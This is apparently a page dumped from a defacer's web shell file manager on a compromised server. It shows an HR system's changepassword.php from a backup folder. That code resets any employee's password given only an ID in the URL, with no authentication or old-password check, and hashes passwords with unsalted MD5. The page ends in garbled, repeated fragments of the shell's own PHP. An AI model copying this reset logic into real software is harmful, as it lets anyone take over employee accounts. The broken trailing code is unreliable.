Asikk-&wkwkwkwkw

whoami7 - Manager

: /home/gracious/hris.graciousphils.com/backup hris employee/

files >> /home/gracious/hris.graciousphils.com/backup hris employee/changepassword.php

 <?php
session_start();
error_reporting(0);
include('includes/config.php');
?>
<!doctype html>
<html lang="en">
  <head>
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="includes/assets/bootstrap.min.css">
    <title>Change Password</title>
  </head>

  <body>
    <div class="container" style="padding-top: 120px;">
      <div class="col-md-12">
        <div class="card border-white">
          <div class="card-body">
            <div class="row">
              <div class="col-md-3"></div>
              <div class="col-md-6">
                <div class="card border-primary">
                  <div class="card-header bg-primary text-white">
                    Change Password
                  </div>
                  <div class="card-body">
                    <?php 
                    if (isset($_POST['submitpassword'])) {
                        $empcode = trim($_GET['ecd']); // Remove potential whitespace
                        $npass = md5($_POST['newpassword']);
                        
                        try {
                            $sql = "UPDATE tblemployees SET PW = :npass WHERE EmpId = :empcode";
                            $query = $dbh->prepare($sql);
                            $query->bindParam(':empcode', $empcode, PDO::PARAM_STR);
                            $query->bindParam(':npass', $npass, PDO::PARAM_STR);
                            $query->execute();
                            
                            if($query->rowCount() > 0) {
                                echo "<div class='alert alert-success alert-dismissible'>
                                        <button type='button' class='btn-close' data-bs-dismiss='alert'></button>
                                        <strong>Password Successfully changed!</strong> 
                                        <a href='index.php' class='alert-link'>Click here to login</a>
                                      </div>";
                            } else {
                                echo "<div class='alert alert-danger alert-dismissible'>
                                        <button type='button' class='btn-close' data-bs-dismiss='alert'></button>
                                        <strong>Employee ID not found or password is the same!</strong>
                                      </div>";
                            }
                        } catch (PDOException $e) {
                            error_log("Password change error: " . $e->getMessage());
                            echo "<div class='alert alert-danger alert-dismissible'>
                                    <button type='button' class='btn-close' data-bs-dismiss='alert'></button>
                                    <strong>Database error occurred!</strong>
                                  </div>";
                        }
                    }
                    ?>
                    <form method="POST" onsubmit="return validateForm()">
                      <div class="form-group">
                        <label class="col-form-label mt-2" for="newpassword">New Password</label>
                        <input type="password" class="form-control" placeholder="New Password" id="newpassword" name="newpassword" required>
                        <input type="checkbox" onclick="togglePassword('newpassword')" class="mt-2"> Show Password
                      </div>
                      <div class="form-group">
                        <label class="col-form-label mt-2" for="confirmpassword">Confirm Password</label>
                        <input type="password" class="form-control" placeholder="Confirm Password" id="confirmpassword" name="confirmpassword" required>
                        <input type="checkbox" onclick="togglePassword('confirmpassword')" class="mt-2"> Show Password
                      </div>
                      <button type="submit" class="btn btn-primary form-control mt-3" id="submitpassword" name="submitpassword">Change Password</button>
                    </form>
                  </div>
                </div>
              </div>
              <div class="col-md-3"></div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <script>
    function togglePassword(fieldId) {
        var field = document.getElementById(fieldId);
        field.type = field.type === "password" ? "text" : "password";
    }

    function validateForm() {
        var newPass = document.getElementById("newpassword").value;
        var confirmPass = document.getElementById("confirmpassword").value;
        
        if (newPass !== confirmPass) {
            alert("Passwords do not match!");
            return false;
        }
        
        if (newPass.length < 6) {
            alert("Password must be at least 6 characters long!");
            return false;
        }
        
        return true;
    }
    </script>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
  </body>
</html>

Copyright ©2021 || Defacer Indonesia nfo .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> )); return $info; } ?> ?>